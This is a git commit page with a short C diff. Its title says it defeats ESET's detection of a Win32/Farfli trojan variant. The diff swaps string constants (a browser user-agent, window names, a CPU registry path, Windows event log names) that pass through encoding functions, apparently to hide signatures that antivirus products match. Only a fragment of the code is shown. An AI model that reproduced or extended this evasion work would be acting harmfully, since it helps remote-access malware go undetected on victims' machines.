Anti Anti- Virus eset : a variant of Win32/Farfli.ADV trojan

This commit is contained in:
Cc28257
2020-06-20 13:28:22 +08:00
parent 00511401f8
commit 3943db0336
14 changed files with 239 additions and 32 deletions

Binary file not shown.

Binary file not shown.

View File

@@ -39,10 +39,10 @@ char* uncode(char* str)
int main()
{
char a[] = "Mozilla/4.0 (compatible)";
char b[] = "VideoCapWindow";
char c[] = "LyxInstaller.exe";
char d[] = "%-24s %-15s 0x%x";
char a[] = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0";
char b[] = "Security";
char c[] = "System";
char d[] = "Application";
char* s1 = crycode(a);
char* s2 = crycode(b);
char* s3 = crycode(c);